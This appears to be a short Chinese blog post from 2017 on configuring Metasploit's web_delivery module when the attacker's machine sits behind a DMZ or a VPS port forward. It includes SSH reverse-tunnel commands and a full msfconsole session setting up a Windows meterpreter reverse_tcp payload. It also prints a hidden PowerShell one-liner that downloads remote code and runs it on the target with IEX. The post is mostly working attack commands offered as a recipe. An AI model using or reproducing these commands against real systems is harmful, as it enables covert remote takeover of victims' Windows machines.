之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的地址为内网地址,即不可能获取到会话,查看详细配置信息,发现存在reverselistenerbindaddress 设置选项,解决了此问题,当然,此参数也适用于用vps转发端口使用本地msf的情况。详细配置如下:

使用vps转发 8081 端口到本地8081端口 (web_delivery服务端口)

ssh -N -R 8081:ip:8081 user@ip

使用vps转发 6666 端口到本地6666端口 (web_delivery payload 监听端口)

ssh -N -R 6666:ip:6666 user@ip

msf开启并配置web_delivery

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(web_delivery) > set URIPATH /
URIPATH => /
msf exploit(web_delivery) > set lhost ip  #外网ip地址
lhost => ip
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set reverselistenerbindaddress 192.168.2.100 #内网ip地址
reverselistenerbindaddress => 192.168.2.100
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

客户端执行:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

内网msf获取meterpreter会话。

DMZ情形下,不需要做端口转发,只需要把lhost设置为外网ip地址,reverselistenerbindaddress 设置为内网ip地址即可。

最后由 Evi1cg 编辑于2017年01月17日 16:16